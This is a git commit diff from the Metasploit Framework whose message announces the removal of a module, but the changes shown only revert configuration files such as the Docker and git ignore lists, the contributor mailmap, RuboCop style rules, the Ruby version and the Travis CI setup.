Remove scrollout_loadlogs_exec for @bcoles

We are unable to get this module to work reliably, please see #6235
for more info.

.dockerignore

@@ -1,105 +0,0 @@
-.dockerignore
-.gitignore
-.env*
-docker-compose*.yml
-docker/
-!docker/msfconsole.rc
-!docker/entrypoint.sh
-!docker/database.yml
-Dockerfile
-README.md
-.git/
-.github/
-.ruby-version
-.ruby-gemset
-
-.bundle
-Gemfile.local
-Gemfile.local.lock
-# Rubymine project directory
-.idea
-# Sublime Text project directory (not created by ST by default)
-.sublime-project
-# RVM control file, keep this to avoid backdooring Metasploit
-.rvmrc
-# Allow for a local choice of (unsupported / semi-supported) ruby versions
-# See PR #4136 for usage, but example usage for rvm:
-#   rvm --create --versions-conf use 2.1.4@metasploit-framework
-# Because rbenv doesn't use .versions.conf, to achieve this same functionality, run:
-#   rbenv shell 2.1.4
-.versions.conf
-# YARD cache directory
-.yardoc
-# Mac OS X files
-.DS_Store
-# database config for testing
-config/database.yml
-# target config file for testing
-features/support/targets.yml
-# simplecov coverage data
-coverage/
-doc/
-external/source/meterpreter/java/bin
-external/source/meterpreter/java/build
-external/source/meterpreter/java/extensions
-external/source/javapayload/bin
-external/source/javapayload/build
-# Java binary ignores. Replace the 5 above with this once we're merged.
-external/source/javapayload/*/.classpath
-external/source/javapayload/*/.project
-external/source/javapayload/*/.settings
-external/source/javapayload/*/bin
-external/source/javapayload/*/target
-external/source/javapayload/*/*/.classpath
-external/source/javapayload/*/*/.project
-external/source/javapayload/*/*/.settings
-external/source/javapayload/*/*/bin
-external/source/javapayload/*/*/target
-# Packaging directory
-pkg
-tags
-*.swp
-*.orig
-*.rej
-*~
-# Ignore backups of retabbed files
-*.notab
-
-# ignore Visual Studio external source garbage
-*.suo
-*.sdf
-*.opensdf
-*.user
-
-# Rails log directory
-/log
-# Rails tmp directory
-/tmp
-
-# ignore release/debug folders for exploits
-external/source/exploits/**/Debug
-external/source/exploits/**/Release
-
-# Avoid checking in Meterpreter binaries. These are supplied upstream by
-# the metasploit-payloads gem.
-data/meterpreter/*.dll
-data/meterpreter/*.php
-data/meterpreter/*.py
-data/meterpreter/*.bin
-data/meterpreter/*.jar
-data/meterpreter/*.lso
-data/android
-data/java
-
-# Avoid checking in Meterpreter libs that are built from
-# private source. If you're interested in this functionality,
-# check out Metasploit Pro: https://metasploit.com/download
-data/meterpreter/ext_server_pivot.*.dll
-
-# Avoid checking in metakitty, the source for
-# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
-/metakitty
-.vagrant
-
-# no need for rspecs
-spec/

.github/PULL_REQUEST_TEMPLATE.md

@@ -2,8 +2,6 @@
 Tell us what this change does. If you're fixing a bug, please mention
 the github issue number.
 
-Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.
-
 ## Verification
 
 List the steps needed to make sure this thing works
@@ -13,5 +11,4 @@ List the steps needed to make sure this thing works
 - [ ] ...
 - [ ] **Verify** the thing does what it should
 - [ ] **Verify** the thing does not do what it should not
-- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))
 

.gitignore

@@ -78,22 +78,10 @@ data/java
 
 # Avoid checking in Meterpreter libs that are built from
 # private source. If you're interested in this functionality,
-# check out Metasploit Pro: https://metasploit.com/download
+# check out Metasploit Pro: http://metasploit.com/download
 data/meterpreter/ext_server_pivot.*.dll
 
 # Avoid checking in metakitty, the source for
 # https://rapid7.github.io/metasploit-framework. It's an orphan branch.
 /metakitty
 .vagrant
-
-# local docker compose overrides
-docker-compose.local*
-.env
-
-# Ignore python bytecode
-*.pyc
-rspec.failures
-
-
-#Ignore any base disk store files
-db/modules_metadata_base.pstore

.mailmap

@@ -1,42 +1,58 @@
-acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
-acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
-acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
-adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
-adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
-bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
-bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
-bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
-bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
-cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
-cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
-dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
-dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
-ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
-jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
-jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
-jinq102030 <jinq102030@github>         <jqian@rapid7.com>
-jmartin-r7 <jmartin-r7@github>         <Jeffrey_Martin@rapid7.com>
-lsato-r7 <lsato-r7@github>             <lsato@rapid7.com>
-lvarela-r7 <lvarela-r7@github>         <“leonardo_varela@rapid7.com”>
-mkienow-r7 <mkienow-r7@github>         <matthew_kienow@rapid7.com>
-pbarry-r7 <pbarry-r7@github>           <pearce_barry@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github>   <paul_deardorff@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github>   <Paul_Deardorff@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>     <sgonzalez@rapid7.com>
-sgonzalez-r7 <sgonzalez-r7@github>     <sonny_gonzalez@rapid7.com>
-shuckins-r7 <shuckins-r7@github>       <samuel_huckins@rapid7.com>
-smcintyre-r7 <smcintyre-r7@github>     <spencer_mcintyre@rapid7.com>
-space-r7 <space-r7@github>             <shelby_pace@rapid7.com>
-tdoan-r7 <tdoan-r7@github>             <thao_doan@rapid7.com>
-todb-r7 <todb-r7@github>               <tod_beardsley@rapid7.com>
-todb-r7 <todb-r7@github>               <todb@metasploit.com>
-todb-r7 <todb-r7@github>               <todb@packetfu.com>
-wchen-r7 <wchen-r7@github>             <msfsinn3r@gmail.com> # aka sinn3r
-wchen-r7 <wchen-r7@github>             <wei_chen@rapid7.com>
-wvu-r7 <wvu-r7@github>                 <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>                 <wvu@nmt.edu>
-wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>
+acammack-r7 <acammack-r7@github>     Adam Cammack <Adam_Cammack@rapid7.com>
+bcook-r7 <bcook-r7@github>           <busterb@gmail.com>
+bcook-r7 <bcook-r7@github>           Brent Cook <bcook@rapid7.com>
+bpatterson-r7 <bpatterson-r7@github> Brian Patterson <Brian_Patterson@rapid7.com>
+bpatterson-r7 <bpatterson-r7@github> bpatterson-r7 <Brian_Patterson@rapid7.com>
+bturner-r7 <bturner-r7@github>       Brandon Turner <brandon_turner@rapid7.com>
+bwatters-r7 <bwatters-r7@github>     Brendan <bwatters@rapid7.com>
+bwatters-r7 <bwatters-r7@github>     Brendan Watters <bwatters@rapid7.com>
+cdoughty-r7 <cdoughty-r7@github>     Chris Doughty <chris_doughty@rapid7.com>
+dheiland-r7 <dheiland-r7@github>     Deral Heiland <dh@layereddefense.com>
+dmaloney-r7 <dmaloney-r7@github>     David Maloney <DMaloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>     David Maloney <David_Maloney@rapid7.com>
+dmaloney-r7 <dmaloney-r7@github>     dmaloney-r7 <DMaloney@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     Dev Mohanty <Dev_Mohanty@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     Dev Mohanty <Dev_Mohanty@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     dmohanty-r7 <Dev_Mohanty@rapid7.com>
+dmohanty-r7 <dmohanty-r7@github>     dmohanty-r7 <Dev_Mohanty@rapid7.com>
+ecarey-r7 <ecarey-r7@github>         Erran Carey <e@ipwnstuff.com>
+farias-r7 <farias-r7@github>         Fernando Arias <fernando_arias@rapid7.com>
+gmikeska-r7 <gmikeska-r7@github>     Greg Mikeska <greg_mikeska@rapid7.com>
+gmikeska-r7 <gmikeska-r7@github>     Gregory Mikeska <greg_mikeska@rapid7.com>
+jbarnett-r7 <jbarnett-r7@github>     James Barnett <James_Barnett@rapid7.com>
+jhart-r7 <jhart-r7@github>           Jon Hart <jon_hart@rapid7.com>
+jlee-r7 <jlee-r7@github>             <egypt@metasploit.com> # aka egypt
+jlee-r7 <jlee-r7@github>             <james_lee@rapid7.com>
+kgray-r7 <kgray-r7@github>           Kyle Gray <kyle_gray@rapid7.com>
+khayes-r7 <khayes-r7@github>         l0gan <Kirk_Hayes@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance.sanchez+github@gmail.com>
+lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance.sanchez@rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance@AUS-MAC-1041.local>
+lsanchez-r7 <lsanchez-r7@github>     Lance Sanchez <lance@aus-mac-1041.aus.rapid7.com>
+lsanchez-r7 <lsanchez-r7@github>     darkbushido <lance.sanchez@gmail.com>
+lsato-r7 <lsato-r7@github>           Louis Sato <lsato@rapid7.com>
+pbarry-r7 <pbarry-r7@github>         Pearce Barry <pearce_barry@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> Paul Deardorff <Paul_Deardorff@rapid7.com>
+pdeardorff-r7 <pdeardorff-r7@github> pdeardorff-r7 <paul_deardorff@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         Scott Davis <Scott_Davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         Scott Lee Davis <scott_davis@rapid7.com>
+sdavis-r7 <sdavis-r7@github>         Scott Lee Davis <sdavis@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>   Sonny Gonzalez <sgonzalez@rapid7.com>
+sgonzalez-r7 <sgonzalez-r7@github>   Sonny Gonzalez <sonny_gonzalez@rapid7.com>
+shuckins-r7 <shuckins-r7@github>     Samuel Huckins <samuel_huckins@rapid7.com>
+tdoan-r7 <tdoan-r7@github>           tdoan-r7 <thao_doan@rapid7.com>
+tdoan-r7 <tdoan-r7@github>           thao doan <thao_doan@rapid7.com>
+todb-r7 <todb-r7@github>             Tod Beardsley <tod_beardsley@rapid7.com>
+todb-r7 <todb-r7@github>             Tod Beardsley <todb@metasploit.com>
+todb-r7 <todb-r7@github>             Tod Beardsley <todb@packetfu.com>
+wchen-r7 <wchen-r7@github>           <msfsinn3r@gmail.com> # aka sinn3r
+wchen-r7 <wchen-r7@github>           <wei_chen@rapid7.com>
+wvu-r7 <wvu-r7@github>               William Vu <William_Vu@rapid7.com>
+wvu-r7 <wvu-r7@github>               William Vu <wvu@cs.nmt.edu>
+wvu-r7 <wvu-r7@github>               William Vu <wvu@metasploit.com>
+wvu-r7 <wvu-r7@github>               wvu-r7 <William_Vu@rapid7.com>
+wwebb-r7 <wwebb-r7@github>           William Webb <William_Webb@rapid7.com>
+wwebb-r7 <wwebb-r7@github>           wwebb-r7 <William_Webb@rapid7.com>
 
 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at
@@ -45,21 +61,20 @@ wwalker-r7 <wwalker-r7@github>         <wyatt_walker@rapid7.com>
 # periodically. If you're on this list and would like to not be, just
 # let todb@metasploit.com know.
 
-asoto-r7 <asoto-r7@github>             <aaron_soto@rapid7.com>
 bannedit <bannedit@github>             David Rude <bannedit0@gmail.com>
 bcoles <bcoles@github>                 bcoles <bcoles@gmail.com>
+bcoles <bcoles@github>                 Brendan Coles <bcoles@gmail.com>
 bokojan <bokojan@github>               parzamendi-r7 <peter_arzamendi@rapid7.com>
-bpatterson-r7 <bpatterson-r7@github>   <bpatterson@rapid7.com>
-bpatterson-r7 <bpatterson-r7@github>   <Brian_Patterson@rapid7.com>
 brandonprry <brandonprry@github>       <bperry@brandons-mbp.attlocal.net>
-brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 brandonprry <brandonprry@github>       Brandon Perry <bperry.volatile@gmail.com>
+brandonprry <brandonprry@github>       Brandon Perry <bperry@bperry-rapid7.(none)>
 brandonprry <brandonprry@github>       Brandon Perry <brandon.perry@zenimaxonline.com>
-bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
 bwall <bwall@github>                   (B)rian (Wall)ace <nightstrike9809@gmail.com>
+bwall <bwall@github>                   Brian Wallace <bwall@openbwall.com>
 ceballosm <ceballosm@github>           Mario Ceballos <mc@metasploit.com>
+Chao-mu <Chao-Mu@github>               Chao Mu <chao.mu@minorcrash.com>
+Chao-mu <Chao-Mu@github>               chao-mu <chao.mu@minorcrash.com>
 Chao-mu <Chao-Mu@github>               chao-mu <chao@confusion.(none)>
-Chao-mu <Chao-Mu@github>               <chao.mu@minorcrash.com>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
 claudijd <claudijd@github>             Jonathan Claudius <claudijd@yahoo.com>
@@ -68,32 +83,24 @@ corelanc0d3r <corelanc0d3r@github>     corelanc0d3r <peter.ve@corelan.be>
 corelanc0d3r <corelanc0d3r@github>     Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
 crcatala <crcatala@github>             Christian Catalan <ccatalan@rapid7.com>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
-DanielRTeixeira <DanielRTeixeira@github> Daniel Teixeira <danieljcrteixeira@gmail.com>
-dmaloney-r7 <dmaloney-r7@github>       <David_Maloney@rapid7.com>
-dmaloney-r7 <dmaloney-r7@github>       <DMaloney@rapid7.com>
-dmohanty-r7 <dmohanty-r7@github>       <Dev_Mohanty@rapid7.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>
-egypt <egypt@github>                   <egypt@metasploit.com> # aka egypt
-egypt <egypt@github>                   <james_lee@rapid7.com>
-espreto <espreto@github>               <robertoespreto@gmail.com>
+espreto <espreto@github>               Roberto Soares <robertoespreto@gmail.com>
+espreto <espreto@github>               Roberto Soares <robertoespreto@gmail.com>
+espreto <espreto@github>               Roberto Soares Espreto <robertoespreto@gmail.com>
+espreto <espreto@github>               Roberto Soares Espreto <robertoespreto@gmail.com>
 fab <fab@???>                          fab <> # fab at revhosts.net (Fabrice MOURRON)
-farias-r7 <farias-r7@github>           <fernando_arias@rapid7.com>
-FireFart <FireFart@github>             <firefart@gmail.com>
 FireFart <FireFart@github>             <FireFart@users.noreply.github.com>
-gmikeska-r7 <gmikeska-r7@github>       <greg_mikeska@rapid7.com>
-gmikeska-r7 <gmikeska-r7@github>       greg.mikeska@rapid7.com <=>
-gmikeska-r7 <gmikeska-r7@github>       greg.mikeska@rapid7.com <YOUR_USERNAME_FOR_EMAIL>
+FireFart <FireFart@github>             Christian Mehlmauer <firefart@gmail.com>
 g0tmi1k <g0tmi1k@github>               <g0tmi1k@users.noreply.github.com>
 g0tmi1k <g0tmi1k@github>               <have.you.g0tmi1k@gmail.com>
-h00die <h00die@github>                 <h00die@users.noreply.github.com>
-h00die <h00die@github>                 <mike@shorebreaksecurity.com>
 h0ng10 <h0ng10@github>                 h0ng10 <hansmartin.muench@googlemail.com>
 h0ng10 <h0ng10@github>                 Hans-Martin Münch <hansmartin.muench@googlemail.com>
-hdm <hdm@github>                       HD Moore <hdm@digitaloffense.net>
 hdm <hdm@github>                       HD Moore <hd_moore@rapid7.com>
+hdm <hdm@github>                       HD Moore <hdm@digitaloffense.net>
 hdm <hdm@github>                       HD Moore <x@hdm.io>
-jabra <jabra@github>                   <jabra@spl0it.org>
+jabra <jabra@github>                   Josh Abraham <jabra@spl0it.org>
+jabra <jabra@github>                   Joshua Abraham <jabra@spl0it.org>
 jcran <jcran@github>                   <jcran@0x0e.org>
 jcran <jcran@github>                   <jcran@pentestify.com>
 jcran <jcran@github>                   <jcran@pwnieexpress.com>
@@ -101,25 +108,18 @@ jcran <jcran@github>                   <jcran@rapid7.com>
 jduck <jduck@github>                   <github.jdrake@qoop.org>
 jduck <jduck@github>                   <jdrake@qoop.org>
 jgor <jgor@github>                     jgor <jgor@indiecom.org>
-jhart-r7 <jhart-r7@github>             <jon_hart@rapid7.com>
-joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           <Joe_Vennix@rapid7.com>
 joevennix <joevennix@github>           <joev@metasploit.com>
+joevennix <joevennix@github>           Joe Vennix <joevennix@gmail.com>
 joevennix <joevennix@github>           jvennix-r7 <Joe_Vennix@rapid7.com>
 juanvazquez <juanvazquez@github>       jvazquez-r7 <juan.vazquez@metasploit.com>
 juanvazquez <juanvazquez@github>       jvazquez-r7 <juan_vazquez@rapid7.com>
 kernelsmith <kernelsmith@github>       Joshua Smith <kernelsmith@kernelsmith.com>
 kernelsmith <kernelsmith@github>       Joshua Smith <kernelsmith@metasploit.com>
 kernelsmith <kernelsmith@github>       kernelsmith <kernelsmith@kernelsmith>
-kgray-r7 <kgray-r7@github>             <kyle_gray@rapid7.com>
 kost <kost@github>                     Vlatko Kosturjak <kost@linux.hr>
 kris <kris@???>                        kris <>
 KronicDeth <KronicDeth@github>         Luke Imhoff <luke_imhoff@rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>       <lance@aus-mac-1041.aus.rapid7.com>
-lsanchez-r7 <lsanchez-r7@github>       <lance@AUS-MAC-1041.local>
-lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez+github@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@gmail.com>
-lsanchez-r7 <lsanchez-r7@github>       <lance.sanchez@rapid7.com>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <github@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <m1k3@s3cur1ty.de>
 m-1-k-3 <m-1-k-3@github>               m-1-k-3 <michael.messner@integralis.com>
@@ -139,26 +139,17 @@ r3dy <r3dy@github>                     Royce Davis <rdavis@Royces-MacBook-Pro-2.
 r3dy <r3dy@github>                     Royce Davis <royce.e.davis@gmail.com>
 rep <mschloesser-r7@github>            Mark Schloesser <mark_schloesser@rapid7.com>
 rep <mschloesser-r7@github>            mschloesser-r7 <mark_schloesser@rapid7.com>
-RageLtMan <sempervictus@github>        <rageltman [at] sempervictus>
-RageLtMan <sempervictus@github>        <rageltman@sempervictus.com>
 Rick Flores <0xnanoquetz9l@gmail.com>  Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
 rsmudge <rsmudge@github>               Raphael Mudge <rsmudge@gmail.com> # Aka `butane
-rwhitcroft <rwhitcroft@github>         <rwhitcroft.github@gmail.com>
-rwhitcroft <rwhitcroft@github>         <rwhitcroft@gmail.com>
-rwhitcroft <rwhitcroft@github>         <rwhitcroft@users.noreply.github.com>
 schierlm <schierlm@github>             Michael Schierl <schierlm@gmx.de> # Aka mihi
 scriptjunkie <scriptjunkie@github>     Matt Weeks <scriptjunkie@scriptjunkie.us>
 scriptjunkie <scriptjunkie@github>     scriptjunkie <scriptjunkie@scriptjunkie.us>
-sdavis-r7 <sdavis-r7@github>           <scott_davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>           <Scott_Davis@rapid7.com>
-sdavis-r7 <sdavis-r7@github>           <sdavis@rapid7.com>
 skape <skape@???>                      Matt Miller <mmiller@hick.org>
 spoonm <spoonm@github>                 Spoon M <spoonm@gmail.com>
-stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
 stufus <stufus@github>                 Stuart <stufus@users.noreply.github.com>
+stufus <stufus@github>                 Stuart Morgan <stuart.morgan@mwrinfosecurity.com>
 swtornio <swtornio@github>             Steve Tornio <swtornio@gmail.com>
 Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
-tatanus <tatanus@github>               <adam_compton@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <Matthew_Buck@rapid7.com>
 techpeace <techpeace@github>           Matt Buck <techpeace@gmail.com>
 timwr <timwr@github>                   <timrlw@gmail.com>
@@ -166,11 +157,10 @@ TomSellers <TomSellers@github>         Tom Sellers <tom@fadedcode.net>
 trevrosen <trevrosen@github>           Trevor Rosen <trevor@catapult-creative.com>
 trevrosen <trevrosen@github>           Trevor Rosen <Trevor_Rosen@rapid7.com>
 TrustedSec <davek@trustedsec.com>      trustedsec <davek@trustedsec.com>
-wwebb-r7 <wwebb-r7@github>             <William_Webb@rapid7.com>
-void-in <void-in@github>               void_in <root@localhost.localdomain>
+void-in <void-in@github>               root <void-in@users.noreply.github.com>
 void-in <void-in@github>               void-in <root@localhost.localdomain>
-void-in <void-in@github>               <void-in@users.noreply.github.com>
 void-in <void-in@github>               void-in <waqas.bsquare@gmail.com>
+void-in <void-in@github>               void_in <root@localhost.localdomain>
 void-in <void-in@github>               Waqas Ali <waqas.bsquare@gmail.com>
 zeroSteiner <zeroSteiner@github>       Spencer McIntyre <zeroSteiner@gmail.com>
 

.rubocop.yml

@@ -8,208 +8,63 @@
 
 # inherit_from: .rubocop_todo.yml
 
-AllCops:
-  TargetRubyVersion: 2.4
-
-require:
-  - ./lib/rubocop/cop/layout/module_hash_on_new_line.rb
-  - ./lib/rubocop/cop/layout/module_description_indentation.rb
-
-Layout/ModuleHashOnNewLine:
-  Enabled: true
-
-Layout/ModuleDescriptionIndentation:
-  Enabled: true
-
 Metrics/ClassLength:
   Description: 'Most Metasploit modules are quite large. This is ok.'
   Enabled: true
   Exclude:
     - 'modules/**/*'
 
-Style/ClassAndModuleChildren:
-  Enabled: false
-  Description: 'Forced nesting is harmful for grepping and general code comprehension'
-
-Metrics/AbcSize:
-  Enabled: false
-  Description: 'This is often a red-herring'
-
-Metrics/CyclomaticComplexity:
-  Enabled: false
-  Description: 'This is often a red-herring'
-
-Metrics/PerceivedComplexity:
-  Enabled: false
-  Description: 'This is often a red-herring'
-
-Style/TernaryParentheses:
-  Enabled: false
-  Description: 'This outright produces bugs'
-
-Style/FrozenStringLiteralComment:
-  Enabled: false
-  Description: 'We cannot support this yet without a lot of things breaking'
-
-Style/RedundantReturn:
-  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
-  Enabled: false
-
-Naming/VariableNumber:
-  Description: 'To make it easier to use reference code, disable this cop'
-  Enabled: false
-
-Style/NumericPredicate:
-  Description: 'This adds no efficiency nor space saving'
-  Enabled: false
-
 Style/Documentation:
   Enabled: true
   Description: 'Most Metasploit modules do not have class documentation.'
   Exclude:
     - 'modules/**/*'
 
-Layout/FirstArgumentIndentation:
-  Enabled: true
-  EnforcedStyle: consistent
-  Description: 'Useful for the module hash to be indented consistently'
-
-Layout/ArgumentAlignment:
-  Enabled: true
-  EnforcedStyle: with_first_argument
-  Description: 'Useful for the module hash to be indented consistently'
-
-Layout/FirstHashElementIndentation:
-  Enabled: true
-  EnforcedStyle: consistent
-  Description: 'Useful for the module hash to be indented consistently'
-
-Layout/FirstHashElementLineBreak:
-  Enabled: true
-  Description: 'Enforce consistency by breaking hash elements on to new lines'
-
-Layout/SpaceInsideArrayLiteralBrackets:
-  Enabled: false
-  Description: 'Almost all module metadata have space in brackets'
-
-Style/GuardClause:
-  Enabled: false
-  Description: 'This often introduces bugs in tested code'
-
-Style/EmptyLiteral:
-  Enabled: false
-  Description: 'This looks awkward when you mix empty and non-empty literals'
-
-Style/NegatedIf:
-  Enabled: false
-  Description: 'This often introduces bugs in tested code'
-
-Style/ConditionalAssignment:
-  Enabled: false
-  Description: 'This is confusing for folks coming from other languages'
-
 Style/Encoding:
+  Enabled: true
   Description: 'We prefer binary to UTF-8.'
-  Enabled: false
-
-Style/ParenthesesAroundCondition:
-  Enabled: false
-  Description: 'This is used in too many places to discount, especially in ported code. Has little effect'
-
-Style/TrailingCommaInArrayLiteral:
-  Enabled: false
-  Description: 'This is often a useful pattern, and is actually required by other languages. It does not hurt.'
+  EnforcedStyle: 'when_needed'
 
 Metrics/LineLength:
   Description: >-
-    Metasploit modules often pattern match against very
-    long strings when identifying targets.
+                  Metasploit modules often pattern match against very
+                  long strings when identifying targets.
   Enabled: true
   Max: 180
 
-Metrics/BlockLength:
-  Enabled: true
-  Description: >-
-    While the style guide suggests 10 lines, exploit definitions
-    often exceed 200 lines.
-  Max: 300
-
 Metrics/MethodLength:
   Enabled: true
   Description: >-
-    While the style guide suggests 10 lines, exploit definitions
-    often exceed 200 lines.
+                  While the style guide suggests 10 lines, exploit definitions
+                  often exceed 200 lines.
   Max: 300
 
-Naming/MethodParameterName:
-  Enabled: true
-  Description: 'Whoever made this requirement never looked at crypto methods, IV'
-  MinNameLength: 2
+# Basically everything in metasploit needs binary encoding, not UTF-8.
+# Disable this here and enforce it through msftidy
+Style/Encoding:
+  Enabled: false
 
 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
-Style/RedundantPercentQ:
+Style/UnneededPercentQ:
   Enabled: false
 
 Style/NumericLiterals:
   Enabled: false
   Description: 'This often hurts readability for exploit-ish code.'
 
-Layout/FirstArrayElementIndentation:
-  Enabled: true
-  EnforcedStyle: consistent
-  Description: 'Useful to force values within the register_options array to have sane indentation'
-
-Layout/EmptyLinesAroundClassBody:
+Style/SpaceInsideBrackets:
   Enabled: false
-  Description: 'these are used to increase readability'
+  Description: 'Until module template are final, most modules will fail this.'
 
-Layout/EmptyLinesAroundMethodBody:
+Style/StringLiterals:
   Enabled: false
-  Description: 'these are used to increase readability'
-
-Layout/ExtraSpacing:
-  Description: 'Do not use unnecessary spacing.'
-  Enabled: true
-  # When true, allows most uses of extra spacing if the intent is to align
-  # things with the previous or next line, not counting empty lines or comment
-  # lines.
-  AllowForAlignment: false
-  # When true, allows things like 'obj.meth(arg)  # comment',
-  # rather than insisting on 'obj.meth(arg) # comment'.
-  # If done for alignment, either this OR AllowForAlignment will allow it.
-  AllowBeforeTrailingComments: false
-  # When true, forces the alignment of `=` in assignments on consecutive lines.
-  ForceEqualSignAlignment: false
-
-Style/For:
-  Enabled: false
-  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'
+  Description: 'Single vs double quote fights are largely unproductive.'
 
 Style/WordArray:
   Enabled: false
   Description: 'Metasploit prefers consistent use of []'
 
-Style/IfUnlessModifier:
-  Enabled: false
-  Description: 'This style might save a couple of lines, but often makes code less clear'
-
-Style/PercentLiteralDelimiters:
-  Description: 'Use `%`-literal delimiters consistently.'
-  Enabled: true
-  # Specify the default preferred delimiter for all types with the 'default' key
-  # Override individual delimiters (even with default specified) by specifying
-  # an individual key
-  PreferredDelimiters:
-    default: ()
-    '%i': '[]'
-    '%I': '[]'
-    '%r': '{}'
-    '%w': '[]'
-    '%W': '[]'
-    '%q': '{}' # Chosen for module descriptions as () are frequently used characters, whilst {} are rarely used
-  VersionChanged: '0.48.1'
-
 Style/RedundantBegin:
   Exclude:
     # this pattern is very common and somewhat unavoidable

.ruby-version

@@ -1 +1 @@
-2.6.5
+2.3.1

.travis.yml

@@ -1,40 +1,24 @@
-dist: trusty
 sudo: false
 group: stable
 bundler_args: --without coverage development pcap
 cache: bundler
 addons:
-  postgresql: '9.6'
+  postgresql: '9.3'
   apt:
     packages:
       - libpcap-dev
       - graphviz
 language: ruby
 rvm:
-  - '2.5.7'
-  - '2.6.5'
+  - '2.3.1'
 
 env:
-  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
-  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
-  # Used for testing the remote data service
-  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1'
-  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1'
+  - RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
+  - RAKE_TASKS=spec SPEC_OPTS="--tag content"
+  - RAKE_TASKS=spec SPEC_OPTS="--tag ~content"
 
 matrix:
   fast_finish: true
-
-jobs:
-  # build docker image
-  include:
-  - env: CMD="/usr/bin/docker-compose build" DOCKER="true"
-    # we do not need any setup
-    before_install: skip
-    install: skip
-    before_script:
-      - curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
-      - chmod +x docker-compose
-      - sudo mv docker-compose /usr/bin
 before_install:
   - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
   - rake --version
@@ -42,22 +26,14 @@ before_install:
   - ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
   - ls -la ./.git/hooks
   - ./.git/hooks/post-merge
-  # Update the bundler
-  - gem update --system 3.0.6
-  - gem install bundler
 before_script:
   - cp config/database.yml.travis config/database.yml
   - bundle exec rake --version
   - bundle exec rake db:create
   - bundle exec rake db:migrate
-  # fail build if db/schema.rb update is not committed
-  - git diff --exit-code db/schema.rb
 script:
-  - echo "${CMD}"
-    # we need travis_wait because the Docker build job can take longer than 10 minutes
-    #- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
-    # docker_wait is currently broken on travis-ci, so let's just run CMD directly for now
-  - bash -c "${CMD}"
+  # fail build if db/schema.rb update is not committed
